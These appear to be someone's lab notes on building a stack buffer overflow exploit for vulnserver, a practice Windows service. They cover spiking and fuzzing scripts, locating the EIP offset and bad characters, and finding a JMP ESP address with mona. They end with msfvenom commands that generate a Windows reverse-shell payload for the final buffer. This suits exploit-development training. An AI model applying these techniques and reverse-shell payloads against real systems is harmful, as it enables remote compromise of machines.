vulnerability development

  • spiking
s_readline();
s_string("TRUN ");
s_string_variable("0");
$ generic_send_tcp host port spike_script 0 0 # vulnserver crashes
# write a small python fuzzing script that sends growing buffers until the service crashes, then find the offset
$ pattern_create.rb -l 2400
$ pattern_offset.rb -l 2400 -q <value in EIP>
# test for bad characters (e.g. the github badchars list) and send them after the EIP overwrite
#  - right click on the stack pointer and "follow in dump"
# use mona to find a suitable module: "!mona modules"
#  - aslr: false, safeseh: false, rebase: false
#  - "!mona jmp -r ESP -m essfunc.dll", take one of the addresses, e.g. 0x625011af -> "\xaf\x11\x50\x62" (little endian)
$ msfvenom -p windows/shell_reverse_tcp LHOST=xxx LPORT=xxx -f c -a x86 -b "\x00"

# final buffer: b"A"*2003 + b"\xaf\x11\x50\x62" + b"\x90"*32 + overflow

exploit development part

  • victim machine has to be a windows machine

    • get a valid windows 10 license from TU (and set the VM up)
    • immunity debugger (try the same with ghidra)
    • vulnserver
    • disable windows defender realtime protection
    • run vulnserver and immunity debugger as admin
  • steps

    1. spiking
    2. fuzzing
    3. find the offset (EIP)
    4. overwrite the eip
    5. finding bad characters
    6. finding the right module
    7. generate shellcode
    8. root!
  • spiking

    • generic_send_tcp HOST PORT spike-script 0 0
    • spike script
    s_readline();
    s_string("STATS ");
    s_string_variable("0");

  • fuzzing to find the approximate buffer size that crashes the service

    • the crash size is the starting point for getting the EIP offset
#!/usr/bin/env python3
# fuzzer: send a growing buffer to the TRUN command until vulnserver stops responding

import sys, socket
from time import sleep

buffer = "A" * 100

while True:
    try:
        payload = "TRUN /.:/" + buffer

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.1.35', 9999))
        print("[+] Sending the payload...\n" + str(len(buffer)))
        s.send(payload.encode())   # python3 sockets need bytes, hence .encode()
        s.close()
        sleep(1)
        buffer = buffer + "A" * 100   # grow by 100 bytes per round
    except OSError:
        # connection refused / reset once vulnserver has crashed
        print("The fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()
  • find the offset

    • /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
    • copy the generated pattern into the script as the buffer
    • run the script again, read the value in EIP
    • pattern_offset.rb -l 3000 -q 386F4337
      • gives offset 2003
  • overwrite the EIP

    • shellcode = 'A'*2003 + 'B'*4
  • finding bad characters

    • https://github.com/cytopia/badchars
    • add the badchars list: badchars = "..." (remove \x00), then shellcode = 'A'*2003 + 'B'*4 + badchars
    • go to hexdump
      • esp right click follow in dump
      • check if there’s anything out of place (01 02 03 04 05 …)
        • search for anything missing
  • finding the right module

    • dll without protections (aslr, etc.)
    • mona: copy mona.py into the immunity debugger PyCommands folder
    • command bar at the bottom: !mona modules
      • search for modules without protection (False, False, False, False), e.g. essfunc.dll
      • opcode for the jump: locate nasm_shell
        • JMP ESP = FF E4
    • !mona find -s "\xff\xe4" -m essfunc.dll
      • get return addresses, e.g. 625011af
    • edit python script
      • shellcode = 'A'*2003 + "\xaf\x11\x50\x62"
  • generate shell code

    • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
    • shellcode = 'A'*2003 + "\xaf\x11\x50\x62" + '\x90'*32 + overflow
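The offset and EIP steps above rely on two things the tools hide: how the cyclic pattern is built and how a 32-bit value read from EIP maps back into it. The following is an added example (not part of the original notes or of Metasploit) that re-implements the pattern_create / pattern_offset logic in Python, packs a return address little-endian, and checks it against a bad-character list; the values 3000, 386F4337 and 0x625011af are the ones the notes use.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits
from typing import Optional


def pattern_create(length: int) -> str:
    """Build the Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") of the given length.
    Any 4-byte window is unique within the first 20280 characters, which is what
    makes the offset lookup unambiguous."""
    triplets = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        triplets.append(upper + lower + digit)
        if len(triplets) * 3 >= length:
            break
    return "".join(triplets)[:length]


def pattern_offset(length: int, eip_hex: str) -> Optional[int]:
    """Offset of the value shown in EIP (hex, as the debugger prints it) inside the
    pattern. x86 stores the dword little-endian, so the four bytes are reversed to
    recover the pattern characters. Returns None when EIP holds no pattern data."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("ascii", errors="replace")
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None


def return_address_bytes(addr: int) -> bytes:
    """Little-endian packing of a return address, the form that goes into the buffer."""
    return struct.pack("<I", addr)


def contains_badchars(data: bytes, badchars: bytes) -> bool:
    """True if any byte of data is in the bad-character list (e.g. a null in the
    JMP ESP address would truncate the string before the rest is copied)."""
    return any(b in badchars for b in data)


if __name__ == "__main__":
    print(pattern_offset(3000, "386F4337"))        # 2003
    print(return_address_bytes(0x625011AF))        # b'\xaf\x11\x50\x62'
    print(contains_badchars(return_address_bytes(0x625011AF), b"\x00"))  # False
```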

python3 and mona

  • add payload.encode() before sending (str payloads)
  • !mona config -set workingfolder c:\mona
  • !mona bytearray -cpb "\x00"
  • copy the bytearray from the mona folder into the python script
  • !mona compare -f c:\mona\bytearray.bin -a
  • !mona jmp -r ESP -m "essfunc.dll" (addresses show up in the log data)
  • alternatively build the payload from byte strings (b"..."); then no .encode() is needed